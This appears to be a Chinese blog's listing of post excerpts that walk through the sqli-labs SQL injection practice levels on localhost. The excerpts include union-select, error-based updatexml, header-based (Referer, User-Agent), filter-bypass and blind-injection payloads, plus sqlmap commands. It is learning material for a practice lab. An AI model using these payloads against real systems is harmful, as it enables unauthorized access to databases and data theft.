随笔分类 -  漏洞复现

摘要:三十五关 http://localhost/sqli-labs/Less-35/?id=-1 union select 1,database(),3 #数据库 http://localhost/sqli-labs/Less-35/?id=-1 union select 1,group_concat( 阅读全文
posted @ 2020-05-03 13:41 llcnKill
摘要:28 基于错误_GET_过滤UNION/SELECT_单引号_小括号_字符型_盲注* http://127.0.0.1/sqli-labs/Less-28/?id=1' or '1 #已经构造好闭合。 个人学习方法,看别人攻略,最重要的是看原理! 越来越想打人,其实没有什么实际意义,推荐:简书 =》 阅读全文
posted @ 2020-04-29 12:51 llcnKill 阅读(267) 评论(0) 推荐(0)
摘要:27 -php5.3.8 过滤了union和select的 查看源码过滤是什么函数,uNion,sElect,我觉得就这样可以简单绕过了. SQL注入闭合才是精华 ,我这么菜当然看源码 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 秒懂 单 阅读全文
posted @ 2020-04-27 17:24 llcnKill
摘要:第二十五关 or and过滤,如何绕过or和and过滤。一般性提供以下几种思路: 1、大小写变形 Or,OR,oR 2、编码,hex,urlencode 3、添加注释/*or*/ 4、利用符号 and=&& or=|| http://127.0.0.1/sqli-labs-master/Less-2 阅读全文
posted @ 2020-04-23 14:46 llcnKill
摘要:第二十三关 ......(其实发现好简单的一关) 就是过滤 #和-- http://127.0.0.1/sqli/Less-23/?id=1' and '1'='1 http://127.0.0.1/sqli/Less-23/?id=1' and updatexml(1,concat(0x7e,(s 阅读全文
posted @ 2020-04-22 13:25 llcnKill 阅读(331) 评论(0) 推荐(0)
摘要:其实漏洞写得很明确了,Referer存在漏洞 Referer:1' and '1'='1--+ Referer:1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1 #数据库 Referer:1' and upd 阅读全文
posted @ 2020-04-22 09:51 llcnKill 阅读(308) 评论(0) 推荐(0)
摘要:User-Agent:' or updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) , 1, 1) # #版本 User-Agent:' or updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) 阅读全文
posted @ 2020-04-21 16:54 llcnKill
摘要:uname=admin&passwd=admin' and 1=1#&submit=Submit uname=admin&passwd=admin' and 1=2#&submit=Submit 深刻感受到我没有学到SQL注入的精髓. uname=admin&passwd=admin' order 阅读全文
posted @ 2020-04-21 15:08 llcnKill 阅读(302) 评论(0) 推荐(0)
摘要:sqli-第15关-时间盲注 时间盲注都是用工具的。手工太难了 将请求复制黏贴到txt,文件中 sqlmap -r C:\Users\Administrator\Desktop\post.txt --dbs sqlmap -r C:\Users\Administrator\Desktop\post. 阅读全文
posted @ 2020-04-20 11:49 llcnKill
摘要:十一关 http://127.0.0.1/sqli/Less-11/ 看到这个页面,添个admin,admin在说. 什么情况,竟然出现这个结果.那么在乱填一个. 明显不一样了.那么我还是抓包处理一下. 抓到包,我们可以尝试重发测试. 看到数据库报错,第一个时间想到这点有漏洞. uname=xxey 阅读全文
posted @ 2020-04-17 09:44 llcnKill 阅读(333) 评论(0) 推荐(0)
摘要:时间盲注也叫延迟注入 延迟注入,是一种盲注的手法,提交队形时间敏感的函数SQL语句,通过执行时间的长短来判断是否执行成功。 延迟注入的函数 sleep() #时间函数 if(condition,true,false) #条件语句 ascii() #转换成accii码 substring("strin 阅读全文
posted @ 2020-04-16 10:59 llcnKill 阅读(877) 评论(0) 推荐(0)
摘要:布尔盲注(基于sqli-labs第八关) 对于盲注只有2种感觉,好玩,好烦。 新技能好玩,一个一个猜好烦。不知道你们是否跟我一样。 手工注入,一个个猜解。大多数人都会觉得特别烦躁的东西。 注入还设有第一点,看注入点在哪里。 个人的查看注入点的方式'单引号,“双引号, http://localhost 阅读全文
posted @ 2020-04-14 16:01 llcnKill 阅读(1509) 评论(0) 推荐(0)
摘要:http://localhost/sqli/Less-7 (注入SQL ) http://localhost/sqli/Less-7/?id=1')) --+ #确认闭合点 http://localhost/sqli/Less-7/?id=1')) order by 3--+ #确认列数 引用一道面 阅读全文
posted @ 2020-04-14 11:52 llcnKill 阅读(1151) 评论(0) 推荐(0)
摘要:SQL注入点判断: 1、单引号判断 http://localhost/sqli/Less-1/?id=1' 如果出现错误提示,则该网站可能就存在注入漏洞 2、and判断 http://localhost/sqli/Less-1/?id=1' and 1=1--+ 这个条件永远都是真的,所以当然返回是 阅读全文
posted @ 2020-04-07 16:31 llcnKill